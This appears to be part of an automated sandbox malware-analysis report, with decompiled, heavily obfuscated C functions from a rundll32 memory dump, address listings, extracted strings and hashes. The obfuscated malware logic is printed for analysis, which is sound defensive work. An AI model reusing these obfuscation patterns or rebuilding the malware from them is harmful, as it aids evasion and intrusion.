				_v188 = _v188 + 0xffffeee7;
				_v188 = _v188 * 0x69;
				_v188 = _v188 ^ 0x0017037d;
				_v136 = 0x714d;
				_v136 = _v136 + 0xffff748b;
				_v136 = _v136 ^ 0xffffb279;
				_v196 = 0xd7b0;
				_t436 = 0x48;
				_v196 = _v196 / _t436;
				_v196 = _v196 / _t481;
				_v196 = _v196 ^ 0x00003ce2;
				_v216 = 0xd5fb;
				_v216 = _v216 + 0xa68;
				_v216 = _v216 | 0x791d863a;
				_v216 = _v216 >> 0xf;
				_v216 = _v216 ^ 0x00008f67;
				_v184 = 0x4bf6;
				_v184 = _v184 | 0xf44b95c1;
				_v184 = _v184 ^ 0xbb4e826a;
				_v184 = _v184 ^ 0x4f05014a;
				_v256 = 0xf4fe;
				_t437 = 0x50;
				_v256 = _v256 / _t437;
				_v256 = _v256 ^ 0x14b50033;
				_t438 = 0x34;
				_v256 = _v256 / _t438;
				_v256 = _v256 ^ 0x0065b701;
				_v232 = 0xb2ca;
				_v232 = _v232 << 0xf;
				_v232 = _v232 + 0xfffff7b7;
				_v232 = _v232 >> 1;
				_v232 = _v232 ^ 0x2cb20e9c;
				_v228 = 0xbca0;
				_v228 = _v228 >> 1;
				_v228 = _v228 + 0x7aaf;
				_v228 = _v228 + 0xda3;
				_v228 = _v228 ^ 0x00009b49;
				_v236 = 0xf1ac;
				_v236 = _v236 * 0x64;
				_v236 = _v236 | 0xe258fcc9;
				_v236 = _v236 + 0xfbbb;
				_v236 = _v236 ^ 0xe25fddd2;
				_v148 = 0x73ca;
				_v148 = _v148 ^ 0x2d0eeb68;
				_v148 = _v148 ^ 0x2d0e98a3;
				_t482 = _v120;
				goto L1;
				do {
					while(1) {
						L1:
						_t439 = _v212;
						_t396 = _v220;
						while(1) {
							L2:
							_t491 = _t483 - 0x2905c209;
							if(_t491 > 0) {
								break;
							}
							if(_t491 == 0) {
								_t483 = 0xef221de;
								continue;
							}
							if(_t483 == 0x6538981) {
								_v116 = 0x6c;
								_t333 =  *0x1001f9d0 + 0x30; // 0x10020bfc
								_t340 =  *0x1001f9d0 + 4; // 0x5a
								_t412 = E001B93A1( &_v108, _v148,  *_t340,  &_v116, _v240, _v224, _v180, _v188,  *_t333, _v248, _v136, _v196);
								_t489 =  &(_t489[0xa]);
								if(_t412 == 0) {
									_t483 = 0x29c171a3;
									while(1) {
										L1:
										_t439 = _v212;
										_t396 = _v220;
										goto L2;
									}
								}
								_t445 =  &_v1;
								_t479 = _t482;
								do {
									 *_t479 =  *_t445;
									_t479 = _t479 + 1;
									_t445 = _t445 - 1;
								} while (_t445 >=  &_v96);
								_t483 = 0x1c508320;
								while(1) {
									L1:
									_t439 = _v212;
									_t396 = _v220;
									goto L2;
								}
							}
							if(_t483 == 0xef221de) {
								_t416 = _a4 + 1;
								if((_t416 & 0x0000000f) != 0) {
									_t416 = (_t416 & 0xfffffff0) + 0x10;
								}
								 *((intOrPtr*)(_t429 + 4)) = _t416 + 0x74;
								_push(_t439);
								_push(_t439);
								_t482 = E001B922B( *((intOrPtr*)(_t429 + 4)));
								_t489 =  &(_t489[3]);
								 *_t429 = _t482;
								if(_t482 == 0) {
									goto L31;
								} else {
									_t323 = _t482 + 0x74; // 0x74
									_t439 = _t323;
									_v120 = _a4;
									_t483 = 0x2dc45afa;
									_t396 =  *((intOrPtr*)(_t429 + 4)) - 0x74;
									_v212 = _t439;
									_v220 =  *((intOrPtr*)(_t429 + 4)) - 0x74;
									continue;
								}
							}
							if(_t483 == 0x133a3c94) {
								E001A5C9F(_v200,  *_t487, _a4, _t439, _v160);
								_t489 =  &(_t489[3]);
								_t483 = 0x33df575d;
								while(1) {
									L1:
									_t439 = _v212;
									_t396 = _v220;
									goto L2;
								}
							}
							if(_t483 != 0x1c508320) {
								goto L30;
							}
							_v112 = 0x14;
							_t427 = E001ACE84( &_v112, _v124, _v216, _t482 + 0x60, _v192, _v184, _v256, _t439, _v232);
							_t439 = _v212;
							_t489 =  &(_t489[7]);
							_t396 = _v220;
							if(_t427 == 0) {
								continue;
							}
							_t483 = 0x29c171a3;
							_v128 = 1;
							while(1) {
								L1:
								_t439 = _v212;
								_t396 = _v220;
								goto L2;
							}
						}
						if(_t483 == 0x29c171a3) {
							_push(_t439);
							E001A69B4(_v124);
							_t483 = 0x3587c7e9;
							break;
						}
						if(_t483 == 0x2dc45afa) {
							_t358 =  *0x1001f9d0 + 8; // 0x1001fe08
							E001A8963( &_v124, _t439,  *_t358, _v244, _v132, _v164, _v172);
							_t489 =  &(_t489[6]);
							asm("sbb esi, esi");
							_t483 = (_t483 & 0xddb274ab) + 0x3587c7e9;
							while(1) {
								L1:
								_t439 = _v212;
								_t396 = _v220;
								goto L2;
							}
						}
						if(_t483 == 0x33df575d) {
							_t349 =  *0x1001f9d0 + 4; // 0x5a
							E001AD383(_v252, _t439, _v124, _t439,  &_v120, _v260,  *_t349, _t396, _v140, _v264, _v208);
							_t489 =  &(_t489[0xa]);
							asm("sbb esi, esi");
							_t483 = (_t483 & 0xdc9217de) + 0x29c171a3;
							continue;
						}
						if(_t483 != 0x3587c7e9) {
							break;
						}
						_t484 = _v128;
						if(_t484 == 0) {
							E001AE380(_v204,  *_t429, _v156);
						}
						L32:
						return _t484;
					}
					L30:
				} while (_t483 != 0x110ea734);
				L31:
				_t484 = _v128;
				goto L32;
			}

0x001b5140
0x001b5147
0x001b5149
0x001b514b
0x001b5152
0x001b5159
0x001b5160
0x001b5161
0x001b5162
0x001b5167
0x001b516f
0x001b5172
0x001b5180
0x001b5185
0x001b518f
0x001b5194
0x001b5198
0x001b51a0
0x001b51a8
0x001b51b0
0x001b51bf
0x001b51c2
0x001b51c3
0x001b51c7
0x001b51cf
0x001b51d7
0x001b51df
0x001b51e7
0x001b51ef
0x001b51fa
0x001b5202
0x001b520d
0x001b5223
0x001b522a
0x001b5235
0x001b523d
0x001b5245
0x001b524d
0x001b5255
0x001b5264
0x001b5270
0x001b5274
0x001b527c
0x001b5284
0x001b528f
0x001b529e
0x001b52a3
0x001b52a7
0x001b52af
0x001b52b7
0x001b52c1
0x001b52c5
0x001b52c9
0x001b52d1
0x001b52e4
0x001b52eb
0x001b52f8
0x001b5300
0x001b530b
0x001b5310
0x001b5316
0x001b531e
0x001b5326
0x001b532e
0x001b5336
0x001b533e
0x001b5346
0x001b5353
0x001b5356
0x001b5357
0x001b535b
0x001b5363
0x001b5373
0x001b5377
0x001b537c
0x001b5384
0x001b538c
0x001b5394
0x001b539c
0x001b53a4
0x001b53ac
0x001b53b4
0x001b53b9
0x001b53be
0x001b53c6
0x001b53ce
0x001b53d9
0x001b53e4
0x001b53ef
0x001b53f7
0x001b53ff
0x001b5407
0x001b540f
0x001b5417
0x001b541f
0x001b5427
0x001b542f
0x001b5437
0x001b543f
0x001b5447
0x001b5452
0x001b5456
0x001b545e
0x001b5466
0x001b546e
0x001b5476
0x001b547e
0x001b5486
0x001b548e
0x001b5496
0x001b549e
0x001b54a6
0x001b54ae
0x001b54b6
0x001b54c3
0x001b54c7
0x001b54cf
0x001b54da
0x001b54e5
0x001b54f2
0x001b5500
0x001b5505
0x001b5511
0x001b5517
0x001b551f
0x001b5527
0x001b552f
0x001b5537
0x001b553c
0x001b5544
0x001b554c
0x001b5554
0x001b555c
0x001b5564
0x001b5570
0x001b5575
0x001b557b
0x001b5587
0x001b558a
0x001b558e
0x001b5596
0x001b559e
0x001b55a3
0x001b55ab
0x001b55af
0x001b55b7
0x001b55bf
0x001b55c3
0x001b55cb
0x001b55d3
0x001b55db
0x001b55e8
0x001b55ec
0x001b55f4
0x001b55fc
0x001b5604
0x001b560f
0x001b561a
0x001b5625
0x001b5625
0x001b562c
0x001b562c
0x001b562c
0x001b562c
0x001b5630
0x001b5634
0x001b5634
0x001b5634
0x001b563a
0x00000000
0x00000000
0x001b5640
0x001b57e4
0x00000000
0x001b57e4
0x001b564c
0x001b575e
0x001b5780
0x001b57a7
0x001b57aa
0x001b57af
0x001b57b4
0x001b57da
0x001b562c
0x001b562c
0x001b562c
0x001b5630
0x00000000
0x001b5630
0x001b562c
0x001b57b6
0x001b57bd
0x001b57bf
0x001b57c1
0x001b57c3
0x001b57c4
0x001b57cc
0x001b57d0
0x001b562c
0x001b562c
0x001b562c
0x001b5630
0x00000000
0x001b5630
0x001b562c
0x001b5658
0x001b56f5
0x001b56f8
0x001b56fd
0x001b56fd
0x001b5703
0x001b571c
0x001b571d
0x001b5726
0x001b5728
0x001b572b
0x001b572f
0x00000000
0x001b5735
0x001b5738
0x001b5738
0x001b573b
0x001b5742
0x001b574a
0x001b574d
0x001b5751
0x00000000
0x001b5751
0x001b572f
0x001b5664
0x001b56e0
0x001b56e5
0x001b56e8
0x001b562c
0x001b562c
0x001b562c
0x001b5630
0x00000000
0x001b5630
0x001b562c
0x001b566c
0x00000000
0x00000000
0x001b5679
0x001b56a4
0x001b56a9
0x001b56ad
0x001b56b2
0x001b56b6
0x00000000
0x00000000
0x001b56bc
0x001b56c1
0x001b562c
0x001b562c
0x001b562c
0x001b5630
0x00000000
0x001b5630
0x001b562c
0x001b57f4
0x001b58db
0x001b58dc
0x001b58e2
0x00000000
0x001b58e2
0x001b5800
0x001b58a4
0x001b58af
0x001b58b4
0x001b58b9
0x001b58c1
0x001b562c
0x001b562c
0x001b562c
0x001b5630
0x00000000
0x001b5630
0x001b562c
0x001b580c
0x001b5853
0x001b586f
0x001b5874
0x001b5879
0x001b5881
0x00000000
0x001b5881
0x001b5814
0x00000000
0x00000000
0x001b581a
0x001b5823
0x001b5833
0x001b5838
0x001b58fb
0x001b5906
0x001b5906
0x001b58e7
0x001b58e7
0x001b58f3
0x001b58f3
0x00000000

Strings

a`, xrefs: 001B543F
aLDY, xrefs: 001B5336
az, xrefs: 001B5496
$Q, xrefs: 001B535B
D$, xrefs: 001B522A
Mq, xrefs: 001B54CF
Iv, xrefs: 001B5476
+J, xrefs: 001B54AE
h, xrefs: 001B5527
<, xrefs: 001B5517
s7A, xrefs: 001B5427
l, xrefs: 001B575E
3, xrefs: 001B557B

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $Q$+J$3$D$$Iv$Mq$aLDY$a`$az$h$l$s7A$<
API String ID: 0-3996932931
Opcode ID: af25fbd8a3d6f6e3d8c264658b34e16b559c1ce7b5a0f2f047085eac5478ae78
Instruction ID: 32aedfaef8c58e339e152db2fa5af36e7961d5115a4ca35e9d8224ee25eba561
Opcode Fuzzy Hash: af25fbd8a3d6f6e3d8c264658b34e16b559c1ce7b5a0f2f047085eac5478ae78
Instruction Fuzzy Hash: F71234729087809FE368CF28C585A8BFBE2BBD4358F10891DF5D986260D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001B8279, Relevance: 16.6, Strings: 13, Instructions: 385
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E001B8279() {
				signed int _t409;
				signed int _t412;
				signed int _t421;
				signed int _t422;
				signed int _t426;
				signed int _t428;
				void* _t433;
				signed int _t469;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				void* _t480;
				signed int _t481;
				void* _t486;

				 *((intOrPtr*)(_t486 + 0xac)) = 0x23f27f;
				 *(_t486 + 0xb4) = 0;
				 *(_t486 + 0xb0) = 0x4c49a8;
				_t433 = 0x3177d3dd;
				 *(_t486 + 0x44) = 0x8d5d;
				 *(_t486 + 0x44) =  *(_t486 + 0x44) | 0x54fe633e;
				 *(_t486 + 0x44) =  *(_t486 + 0x44) + 0xcc2a;
				 *(_t486 + 0x44) =  *(_t486 + 0x44) ^ 0x54ffbba8;
				 *(_t486 + 8) = 0x9695;
				 *(_t486 + 8) =  *(_t486 + 8) << 5;
				 *(_t486 + 8) =  *(_t486 + 8) ^ 0x8d96acf8;
				 *(_t486 + 0xa8) = 0;
				 *(_t486 + 0x18) =  *(_t486 + 8) * 0x61;
				 *(_t486 + 0x18) =  *(_t486 + 0x18) ^ 0x9f33df59;
				 *(_t486 + 0x64) = 0xa02c;
				 *(_t486 + 0x64) =  *(_t486 + 0x64) ^ 0xf1fe72f6;
				_t472 = 0x27;
				 *(_t486 + 0x68) =  *(_t486 + 0x64) / _t472;
				 *(_t486 + 0x68) =  *(_t486 + 0x68) ^ 0x063437d1;
				 *(_t486 + 0xa8) = 0x83bb;
				 *(_t486 + 0xa8) =  *(_t486 + 0xa8) >> 6;
				 *(_t486 + 0xa8) =  *(_t486 + 0xa8) ^ 0x00001a7c;
				 *(_t486 + 0x38) = 0x5e06;
				 *(_t486 + 0x38) =  *(_t486 + 0x38) ^ 0xfc89bfa1;
				 *(_t486 + 0x38) =  *(_t486 + 0x38) ^ 0xc41a8841;
				_t473 = 0x38;
				 *(_t486 + 0x38) =  *(_t486 + 0x38) * 0x28;
				 *(_t486 + 0x38) =  *(_t486 + 0x38) ^ 0xd708a467;
				 *(_t486 + 0x88) = 0x654;
				 *(_t486 + 0x88) =  *(_t486 + 0x88) | 0x696c0764;
				 *(_t486 + 0x88) =  *(_t486 + 0x88) ^ 0x696c20fc;
				 *(_t486 + 0xb4) = 0x6aa9;
				 *(_t486 + 0xb4) =  *(_t486 + 0xb4) / _t473;
				 *(_t486 + 0xb4) =  *(_t486 + 0xb4) ^ 0x000065d1;
				 *(_t486 + 0xa4) = 0x734e;
				 *(_t486 + 0xa4) =  *(_t486 + 0xa4) | 0xc307be4d;
				 *(_t486 + 0xa4) =  *(_t486 + 0xa4) ^ 0xc307b1a5;
				 *(_t486 + 0x3c) = 0x801b;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) + 0x7f35;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) + 0xffff8eed;
				_t474 = 9;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) * 0x3e;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) ^ 0x00221218;
				 *(_t486 + 0x34) = 0xeaa9;
				 *(_t486 + 0x34) =  *(_t486 + 0x34) / _t474;
				 *(_t486 + 0x34) =  *(_t486 + 0x34) ^ 0x97c23ca8;
				 *(_t486 + 0x34) =  *(_t486 + 0x34) << 9;
				 *(_t486 + 0x34) =  *(_t486 + 0x34) ^ 0x844d562b;
				 *(_t486 + 0x70) = 0x8a22;
				 *(_t486 + 0x70) =  *(_t486 + 0x70) + 0xffff2723;
				 *(_t486 + 0x70) =  *(_t486 + 0x70) + 0xffffd0b5;
				 *(_t486 + 0x70) =  *(_t486 + 0x70) ^ 0xffffd6fd;
				 *(_t486 + 0x98) = 0xa26a;
				_t475 = 0x37;
				 *(_t486 + 0x94) =  *(_t486 + 0x98) / _t475;
				 *(_t486 + 0x94) =  *(_t486 + 0x94) ^ 0x000047e8;
				 *(_t486 + 0x8c) = 0x5306;
				 *(_t486 + 0x8c) =  *(_t486 + 0x8c) | 0x53a728d9;
				 *(_t486 + 0x8c) =  *(_t486 + 0x8c) ^ 0x53a730b7;
				 *(_t486 + 0x20) = 0x472a;
				 *(_t486 + 0x20) =  *(_t486 + 0x20) | 0x8706d4c5;
				 *(_t486 + 0x20) =  *(_t486 + 0x20) + 0xfffff895;
				_t476 = 0x29;
				 *(_t486 + 0x24) =  *(_t486 + 0x20) / _t476;
				 *(_t486 + 0x24) =  *(_t486 + 0x24) ^ 0x034b11a0;
				 *(_t486 + 0x14) = 0x5214;
				 *(_t486 + 0x14) =  *(_t486 + 0x14) ^ 0x4eb7f7f7;
				 *(_t486 + 0x14) =  *(_t486 + 0x14) << 0x10;
				 *(_t486 + 0x14) =  *(_t486 + 0x14) >> 9;
				 *(_t486 + 0x14) =  *(_t486 + 0x14) ^ 0x0052c7ca;
				 *(_t486 + 0x48) = 0xbe8a;
				 *(_t486 + 0x48) =  *(_t486 + 0x48) | 0x6ea11e17;
				 *(_t486 + 0x48) =  *(_t486 + 0x48) ^ 0x5332d59f;
				 *(_t486 + 0x48) =  *(_t486 + 0x48) ^ 0x3d931311;
				 *(_t486 + 0x50) = 0x8957;
				 *(_t486 + 0x50) =  *(_t486 + 0x50) << 9;
				 *(_t486 + 0x50) =  *(_t486 + 0x50) >> 5;
				 *(_t486 + 0x50) =  *(_t486 + 0x50) ^ 0x0008d070;
				 *(_t486 + 0x4c) = 0xbd25;
				 *(_t486 + 0x4c) =  *(_t486 + 0x4c) + 0xfffffb1f;
				 *(_t486 + 0x4c) =  *(_t486 + 0x4c) ^ 0x10b236cf;
				 *(_t486 + 0x4c) =  *(_t486 + 0x4c) ^ 0x10b2cc6c;
				 *(_t486 + 0x64) = 0x2b80;
				 *(_t486 + 0x64) =  *(_t486 + 0x64) + 0x427c;
				 *(_t486 + 0x64) =  *(_t486 + 0x64) | 0xe54eb77f;
				 *(_t486 + 0x64) =  *(_t486 + 0x64) ^ 0xe54ecb58;
				 *(_t486 + 0x94) = 0xa1a1;
				_t477 = 0x1b;
				 *(_t486 + 0x94) =  *(_t486 + 0x94) * 0x21;
				 *(_t486 + 0x94) =  *(_t486 + 0x94) ^ 0x0014b5fe;
				 *(_t486 + 0xb0) = 0xd1e2;
				 *(_t486 + 0xb0) =  *(_t486 + 0xb0) + 0xffff8f58;
				 *(_t486 + 0xb0) =  *(_t486 + 0xb0) ^ 0x0000462a;
				 *(_t486 + 0x30) = 0xbd5e;
				 *(_t486 + 0x30) =  *(_t486 + 0x30) + 0xe804;
				 *(_t486 + 0x30) =  *(_t486 + 0x30) | 0x865be769;
				 *(_t486 + 0x30) =  *(_t486 + 0x30) << 6;
				 *(_t486 + 0x30) =  *(_t486 + 0x30) ^ 0x96f9c809;
				 *(_t486 + 0x54) = 0x4c01;
				 *(_t486 + 0x54) =  *(_t486 + 0x54) | 0x8122e6e8;
				 *(_t486 + 0x54) =  *(_t486 + 0x54) >> 0xb;
				 *(_t486 + 0x54) =  *(_t486 + 0x54) ^ 0x001039f9;
				 *(_t486 + 0x74) = 0x7e82;
				 *(_t486 + 0x74) =  *(_t486 + 0x74) + 0xffffb8bd;
				 *(_t486 + 0x74) =  *(_t486 + 0x74) * 0x56;
				 *(_t486 + 0x74) =  *(_t486 + 0x74) ^ 0x0012c48e;
				 *(_t486 + 0x84) = 0x5368;
				 *(_t486 + 0x84) =  *(_t486 + 0x84) + 0xffffd43f;
				 *(_t486 + 0x84) =  *(_t486 + 0x84) ^ 0x0000575d;
				 *(_t486 + 0x8c) = 0xbbf0;
				 *(_t486 + 0x8c) =  *(_t486 + 0x8c) | 0x7588fbe3;
				 *(_t486 + 0x8c) =  *(_t486 + 0x8c) ^ 0x7588e5f2;
				 *(_t486 + 0x18) = 0xbb5c;
				 *(_t486 + 0x18) =  *(_t486 + 0x18) >> 0xf;
				 *(_t486 + 0x18) =  *(_t486 + 0x18) / _t477;
				 *(_t486 + 0x18) =  *(_t486 + 0x18) << 6;
				 *(_t486 + 0x18) =  *(_t486 + 0x18) ^ 0x000008e5;
				 *(_t486 + 0x7c) = 0x27e3;
				_t478 = 0x16;
				 *(_t486 + 0x78) =  *(_t486 + 0x7c) / _t478;
				 *(_t486 + 0x78) =  *(_t486 + 0x78) << 0xd;
				 *(_t486 + 0x78) =  *(_t486 + 0x78) ^ 0x003a76d8;
				 *(_t486 + 0x58) = 0x289e;
				 *(_t486 + 0x58) =  *(_t486 + 0x58) << 4;
				 *(_t486 + 0x58) =  *(_t486 + 0x58) + 0xffff4ae2;
				 *(_t486 + 0x58) =  *(_t486 + 0x58) ^ 0x0001f5bb;
				 *(_t486 + 0x68) = 0xc0ee;
				_t479 = 0x28;
				_t431 =  *(_t486 + 0xb4);
				_t469 =  *(_t486 + 0xb4);
				 *(_t486 + 0x68) =  *(_t486 + 0x68) * 0x36;
				 *(_t486 + 0x68) =  *(_t486 + 0x68) + 0xfffff104;
				 *(_t486 + 0x68) =  *(_t486 + 0x68) ^ 0x0028ad02;
				 *(_t486 + 0x24) = 0x6618;
				 *(_t486 + 0x24) =  *(_t486 + 0x24) ^ 0x4c258e12;
				 *(_t486 + 0x24) =  *(_t486 + 0x24) + 0xffff62b3;
				 *(_t486 + 0x24) =  *(_t486 + 0x24) ^ 0xeb87d2b6;
				 *(_t486 + 0x24) =  *(_t486 + 0x24) ^ 0xa7a2cea3;
				 *(_t486 + 0x3c) = 0x531e;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) + 0xffff0da0;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) + 0xffffbba6;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) + 0xfe91;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) ^ 0x0000637b;
				 *(_t486 + 0xa8) = 0x581d;
				 *(_t486 + 0xa8) =  *(_t486 + 0xa8) ^ 0xccef8aaa;
				 *(_t486 + 0xa8) =  *(_t486 + 0xa8) ^ 0xccef8ba4;
				 *(_t486 + 0x1c) = 0x42fd;
				 *(_t486 + 0x1c) =  *(_t486 + 0x1c) + 0xffffdb0a;
				 *(_t486 + 0x1c) =  *(_t486 + 0x1c) + 0xffffa659;
				 *(_t486 + 0x1c) =  *(_t486 + 0x1c) | 0xf6ae1509;
				 *(_t486 + 0x1c) =  *(_t486 + 0x1c) ^ 0xffff989b;
				 *(_t486 + 0x98) = 0xced7;
				 *(_t486 + 0x98) =  *(_t486 + 0x98) >> 2;
				 *(_t486 + 0x98) =  *(_t486 + 0x98) ^ 0x00007c3c;
				 *(_t486 + 0x5c) = 0x28f8;
				_t484 =  *(_t486 + 0xb4);
				 *(_t486 + 0x5c) =  *(_t486 + 0x5c) * 0x14;
				 *(_t486 + 0x5c) =  *(_t486 + 0x5c) | 0x45551963;
				 *(_t486 + 0x5c) =  *(_t486 + 0x5c) ^ 0x45574e02;
				 *(_t486 + 0x40) = 0x776f;
				 *(_t486 + 0x40) =  *(_t486 + 0x40) + 0xffffe204;
				 *(_t486 + 0x40) =  *(_t486 + 0x40) << 0xb;
				 *(_t486 + 0x40) =  *(_t486 + 0x40) + 0xffff640e;
				 *(_t486 + 0x40) =  *(_t486 + 0x40) ^ 0x02caf0c2;
				 *(_t486 + 0x7c) = 0x1fa6;
				 *(_t486 + 0x7c) =  *(_t486 + 0x7c) + 0xf883;
				 *(_t486 + 0x7c) =  *(_t486 + 0x7c) + 0xffff7a6f;
				 *(_t486 + 0x7c) =  *(_t486 + 0x7c) ^ 0x0000fcf5;
				 *(_t486 + 0x9c) = 0x9499;
				 *(_t486 + 0x9c) =  *(_t486 + 0x9c) << 0xf;
				 *(_t486 + 0x9c) =  *(_t486 + 0x9c) ^ 0x4a4c8ff3;
				 *(_t486 + 0x74) = 0x5d89;
				_t480 = 0x216d57e9;
				 *(_t486 + 0x74) =  *(_t486 + 0x74) / _t479;
				 *(_t486 + 0x74) =  *(_t486 + 0x74) << 0xe;
				 *(_t486 + 0x74) =  *(_t486 + 0x74) ^ 0x0095c9c8;
				 *(_t486 + 0x28) = 0x444e;
				 *(_t486 + 0x28) =  *(_t486 + 0x28) | 0xf2adfff0;
				 *(_t486 + 0x28) =  *(_t486 + 0x28) << 2;
				 *(_t486 + 0x28) =  *(_t486 + 0x28) * 0x36;
				 *(_t486 + 0x28) =  *(_t486 + 0x28) ^ 0xc2cffe53;
				L1:
				while(_t433 != 0x6d42f45) {
					if(_t433 == 0x71db371) {
						E001AD194( *(_t486 + 0x70), _t486 + 0xd0, __eflags, _t433,  *(_t486 + 0xa8),  *(_t486 + 0x34));
						_t412 = E001B1489( *(_t486 + 0x98),  *((intOrPtr*)(_t486 + 0xc4)),  *(_t486 + 0xb0), _t486 + 0xd8);
						_t484 = _t412;
						_t486 = _t486 + 0x14;
						_t433 = 0x6d42f45;
						 *((short*)(_t412 - 2)) = 0;
						continue;
					}
					if(_t433 == 0xec93344) {
						E001AE380( *(_t486 + 0x9c), _t469,  *(_t486 + 0x5c));
						_t433 = 0x21769d07;
						continue;
					}
					if(_t433 == 0x197f34ec) {
						_push(_t433);
						_push(_t433);
						 *((intOrPtr*)(_t486 + 0xc0)) = 0x1000;
						_t469 = E001B922B(0x1000);
						_t486 = _t486 + 0xc;
						__eflags = _t469;
						_t433 =  !=  ? _t480 : 0x21769d07;
						continue;
					}
					if(_t433 == _t480) {
						_t421 = E001B5BD2( *((intOrPtr*)(_t486 + 0xc8)),  *((intOrPtr*)(_t486 + 0xe0)),  *(_t486 + 0x5c), _t431,  *((intOrPtr*)(_t486 + 0xdc)), _t433,  *(_t486 + 0x70), _t486 + 0xd0,  *(_t486 + 0x88),  *(_t486 + 0x68),  *((intOrPtr*)(_t486 + 0x90)),  *(_t486 + 0x94), _t433,  *(_t486 + 0x18), _t469);
						_t486 = _t486 + 0x38;
						__eflags = _t421;
						if(_t421 == 0) {
							_t422 =  *(_t486 + 0xb8);
							L19:
							__eflags = _t422;
							if(__eflags == 0) {
								_t433 = _t480;
							} else {
								_t350 =  *0x10020714 + 0x24; // 0x48
								E001B12CD( *(_t486 + 0x30),  *_t350,  *(_t486 + 0x44),  *((intOrPtr*)(_t486 + 0xac)),  *(_t486 + 0x1c));
								_t486 = _t486 + 0xc;
								_t433 = 0xec93344;
							}
							continue;
						}
						_t481 = _t469;
						while(1) {
							__eflags =  *((intOrPtr*)(_t481 + 4)) - 4;
							if( *((intOrPtr*)(_t481 + 4)) != 4) {
								goto L13;
							}
							L12:
							_t340 = _t481 + 0xc; // 0x65dd
							_t428 = E001AED9E(_t484,  *((intOrPtr*)(_t486 + 0x80)), _t340,  *(_t486 + 0x5c),  *(_t486 + 0x68));
							_t486 = _t486 + 0xc;
							__eflags = _t428;
							if(_t428 == 0) {
								_t422 = 1;
								 *(_t486 + 0xb8) = 1;
								L18:
								_t480 = 0x216d57e9;
								goto L19;
							}
							L13:
							_t426 =  *_t481;
							__eflags = _t426;
							if(_t426 == 0) {
								_t422 =  *(_t486 + 0xb8);
								goto L18;
							}
							_t481 = _t481 + _t426;
							__eflags =  *((intOrPtr*)(_t481 + 4)) - 4;
							if( *((intOrPtr*)(_t481 + 4)) != 4) {
								goto L13;
							}
							goto L12;
						}
					}
					if(_t433 == 0x21769d07) {
						E001B01E5( *(_t486 + 0x4c),  *(_t486 + 0xa4), _t431,  *(_t486 + 0x74));
						L31:
						__eflags = 0;
						return 0;
					}
					if(_t433 != 0x3177d3dd) {
						L28:
						__eflags = _t433 - 0x8bf23fa;
						if(__eflags != 0) {
							continue;
						}
						goto L31;
					}
					_t433 = 0x71db371;
				}
				_t409 = E001B7809( *(_t486 + 0x68), 0x2000000,  *(_t486 + 0x5c),  *(_t486 + 0x50),  *((intOrPtr*)(_t486 + 0x90)), _t433,  *(_t486 + 0xb0),  *(_t486 + 0xa4),  *(_t486 + 0x34),  *(_t486 + 0x24) | 0x00000006, _t433, _t486 + 0xd0, 1,  *((intOrPtr*)(_t486 + 0x10)));
				_t431 = _t409;
				_t486 = _t486 + 0x30;
				__eflags = _t409 - 0xffffffff;
				if(__eflags == 0) {
					_t433 = 0x8bf23fa;
					goto L28;
				}
				_t433 = 0x197f34ec;
				goto L1;
			}

0x001b827f
0x001b828c
0x001b8295
0x001b82a0
0x001b82a5
0x001b82ad
0x001b82b5
0x001b82bd
0x001b82c5
0x001b82cd
0x001b82d2
0x001b82da
0x001b82ea
0x001b82ee
0x001b82f6
0x001b82fe
0x001b830c
0x001b8311
0x001b8317
0x001b831f
0x001b832a
0x001b8332
0x001b833d
0x001b8345
0x001b834d
0x001b835a
0x001b835d
0x001b8361
0x001b8369
0x001b8374
0x001b837f
0x001b838a
0x001b83a0
0x001b83a7
0x001b83b2
0x001b83bd
0x001b83c8
0x001b83d3
0x001b83db
0x001b83e3
0x001b83f0
0x001b83f3
0x001b83f7
0x001b83ff
0x001b840f
0x001b8413
0x001b841b
0x001b8420
0x001b8428
0x001b8430
0x001b8438
0x001b8440
0x001b8448
0x001b845a
0x001b845d
0x001b8464
0x001b846f
0x001b847a
0x001b8487
0x001b8492
0x001b849a
0x001b84a2
0x001b84b0
0x001b84b5
0x001b84bb
0x001b84c3
0x001b84cb
0x001b84d3
0x001b84d8
0x001b84dd
0x001b84e5
0x001b84ed
0x001b84f5
0x001b84fd
0x001b8505
0x001b850d
0x001b8512
0x001b8517
0x001b851f
0x001b8527
0x001b852f
0x001b8537
0x001b853f
0x001b8547
0x001b854f
0x001b8557
0x001b855f
0x001b8572
0x001b8575
0x001b857c
0x001b8587
0x001b8592
0x001b859d
0x001b85a8
0x001b85b0
0x001b85b8
0x001b85c0
0x001b85c5
0x001b85cd
0x001b85d5
0x001b85dd
0x001b85e2
0x001b85ea
0x001b85f2
0x001b85ff
0x001b8603
0x001b860b
0x001b8616
0x001b8621
0x001b862c
0x001b8637
0x001b8642
0x001b864d
0x001b8655
0x001b8662
0x001b8666
0x001b866b
0x001b8673
0x001b867f
0x001b8682
0x001b8686
0x001b868b
0x001b8693
0x001b869b
0x001b86a0
0x001b86aa
0x001b86b2
0x001b86c1
0x001b86c2
0x001b86c9
0x001b86d0
0x001b86d4
0x001b86dc
0x001b86e4
0x001b86ec
0x001b86f4
0x001b86fc
0x001b8704
0x001b870c
0x001b8714
0x001b871c
0x001b8724
0x001b872c
0x001b8734
0x001b873f
0x001b874a
0x001b8755
0x001b875d
0x001b8765
0x001b876d
0x001b8775
0x001b877d
0x001b8788
0x001b8790
0x001b879b
0x001b87a8
0x001b87af
0x001b87b3
0x001b87bb
0x001b87c3
